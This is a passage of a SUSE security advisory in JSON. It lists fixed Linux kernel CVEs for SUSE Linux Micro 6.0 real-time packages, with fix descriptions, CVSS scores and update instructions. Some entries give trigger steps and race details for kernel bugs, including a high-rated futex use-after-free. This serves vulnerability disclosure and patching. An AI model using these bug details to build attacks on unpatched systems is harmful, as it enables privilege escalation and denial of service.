"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39748",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39748"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Forget ranges when refining tnum after JSET\n\nSyzbot reported a kernel warning due to a range invariant violation on\nthe following BPF program.\n\n 0: call bpf_get_netns_cookie\n 1: if r0 == 0 goto \u003cexit\u003e\n 2: if r0 \u0026 Oxffffffff goto \u003cexit\u003e\n\nThe issue is on the path where we fall through both jumps.\n\nThat path is unreachable at runtime: after insn 1, we know r0 != 0, but\nwith the sign extension on the jset, we would only fallthrough insn 2\nif r0 == 0. Unfortunately, is_branch_taken() isn\u0027t currently able to\nfigure this out, so the verifier walks all branches. The verifier then\nrefines the register bounds using the second condition and we end\nup with inconsistent bounds on this unreachable path:\n\n 1: if r0 == 0 goto \u003cexit\u003e\n r0: u64=[0x1, 0xffffffffffffffff] var_off=(0, 0xffffffffffffffff)\n 2: if r0 \u0026 0xffffffff goto \u003cexit\u003e\n r0 before reg_bounds_sync: u64=[0x1, 0xffffffffffffffff] var_off=(0, 0)\n r0 after reg_bounds_sync: u64=[0x1, 0] var_off=(0, 0)\n\nImproving the range refinement for JSET to cover all cases is tricky. We\nalso don\u0027t expect many users to rely on JSET given LLVM doesn\u0027t generate\nthose instructions. So instead of improving the range refinement for\nJSETs, Eduard suggested we forget the ranges whenever we\u0027re narrowing\ntnums after a JSET. This patch implements that approach.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39748",
"url": "https://www.suse.com/security/cve/CVE-2025-39748"
},
{
"category": "external",
"summary": "SUSE Bug 1249587 for CVE-2025-39748",
"url": "https://bugzilla.suse.com/1249587"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39748"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39890",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39890"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_service_ready_ext_event\n\nCurrently, in ath12k_service_ready_ext_event(), svc_rdy_ext.mac_phy_caps\nis not freed in the failure case, causing a memory leak. The following\ntrace is observed in kmemleak:\n\nunreferenced object 0xffff8b3eb5789c00 (size 1024):\n comm \"softirq\", pid 0, jiffies 4294942577\n hex dump (first 32 bytes):\n 00 00 00 00 01 00 00 00 00 00 00 00 7b 00 00 10 ............{...\n 01 00 00 00 00 00 00 00 01 00 00 00 1f 38 00 00 .............8..\n backtrace (crc 44e1c357):\n __kmalloc_noprof+0x30b/0x410\n ath12k_wmi_mac_phy_caps_parse+0x84/0x100 [ath12k]\n ath12k_wmi_tlv_iter+0x5e/0x140 [ath12k]\n ath12k_wmi_svc_rdy_ext_parse+0x308/0x4c0 [ath12k]\n ath12k_wmi_tlv_iter+0x5e/0x140 [ath12k]\n ath12k_service_ready_ext_event.isra.0+0x44/0xd0 [ath12k]\n ath12k_wmi_op_rx+0x2eb/0xd70 [ath12k]\n ath12k_htc_rx_completion_handler+0x1f4/0x330 [ath12k]\n ath12k_ce_recv_process_cb+0x218/0x300 [ath12k]\n ath12k_pci_ce_workqueue+0x1b/0x30 [ath12k]\n process_one_work+0x219/0x680\n bh_worker+0x198/0x1f0\n tasklet_action+0x13/0x30\n handle_softirqs+0xca/0x460\n __irq_exit_rcu+0xbe/0x110\n irq_exit_rcu+0x9/0x30\n\nFree svc_rdy_ext.mac_phy_caps in the error case to fix this memory leak.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39890",
"url": "https://www.suse.com/security/cve/CVE-2025-39890"
},
{
"category": "external",
"summary": "SUSE Bug 1250334 for CVE-2025-39890",
"url": "https://bugzilla.suse.com/1250334"
},
{
"category": "external",
"summary": "SUSE Bug 1250488 for CVE-2025-39890",
"url": "https://bugzilla.suse.com/1250488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-39890"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39964",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39964"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Disallow concurrent writes in af_alg_sendmsg\n\nIssuing two writes to the same af_alg socket is bogus as the\ndata will be interleaved in an unpredictable fashion. Furthermore,\nconcurrent writes may create inconsistencies in the internal\nsocket state.\n\nDisallow this by adding a new ctx-\u003ewrite field that indiciates\nexclusive ownership for writing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39964",
"url": "https://www.suse.com/security/cve/CVE-2025-39964"
},
{
"category": "external",
"summary": "SUSE Bug 1251966 for CVE-2025-39964",
"url": "https://bugzilla.suse.com/1251966"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-39964"
},
{
"cve": "CVE-2025-39977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfutex: Prevent use-after-free during requeue-PI\n\nsyzbot managed to trigger the following race:\n\n T1 T2\n\n futex_wait_requeue_pi()\n futex_do_wait()\n schedule()\n futex_requeue()\n futex_proxy_trylock_atomic()\n futex_requeue_pi_prepare()\n requeue_pi_wake_futex()\n futex_requeue_pi_complete()\n /* preempt */\n\n * timeout/ signal wakes T1 *\n\n futex_requeue_pi_wakeup_sync() // Q_REQUEUE_PI_LOCKED\n futex_hash_put()\n // back to userland, on stack futex_q is garbage\n\n /* back */\n wake_up_state(q-\u003etask, TASK_NORMAL);\n\nIn this scenario futex_wait_requeue_pi() is able to leave without using\nfutex_q::lock_ptr for synchronization.\n\nThis can be prevented by reading futex_q::task before updating the\nfutex_q::requeue_state. A reference on the task_struct is not needed\nbecause requeue_pi_wake_futex() is invoked with a spinlock_t held which\nimplies a RCU read section.\n\nEven if T1 terminates immediately after, the task_struct will remain valid\nduring T2\u0027s wake_up_state(). A READ_ONCE on futex_q::task before\nfutex_requeue_pi_complete() is enough because it ensures that the variable\nis read before the state is updated.\n\nRead futex_q::task before updating the requeue state, use it for the\nfollowing wakeup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39977",
"url": "https://www.suse.com/security/cve/CVE-2025-39977"
},
{
"category": "external",
"summary": "SUSE Bug 1252046 for CVE-2025-39977",
"url": "https://bugzilla.suse.com/1252046"
},
{
"category": "external",
"summary": "SUSE Bug 1252048 for CVE-2025-39977",
"url": "https://bugzilla.suse.com/1252048"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-39977"
},
{
"cve": "CVE-2025-40006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/hugetlb: fix folio is still mapped when deleted\n\nMigration may be raced with fallocating hole. remove_inode_single_folio\nwill unmap the folio if the folio is still mapped. However, it\u0027s called\nwithout folio lock. If the folio is migrated and the mapped pte has been\nconverted to migration entry, folio_mapped() returns false, and won\u0027t\nunmap it. Due to extra refcount held by remove_inode_single_folio,\nmigration fails, restores migration entry to normal pte, and the folio is\nmapped again. As a result, we triggered BUG in filemap_unaccount_folio.\n\nThe log is as follows:\n BUG: Bad page cache in process hugetlb pfn:156c00\n page: refcount:515 mapcount:0 mapping:0000000099fef6e1 index:0x0 pfn:0x156c00\n head: order:9 mapcount:1 entire_mapcount:1 nr_pages_mapped:0 pincount:0\n aops:hugetlbfs_aops ino:dcc dentry name(?):\"my_hugepage_file\"\n flags: 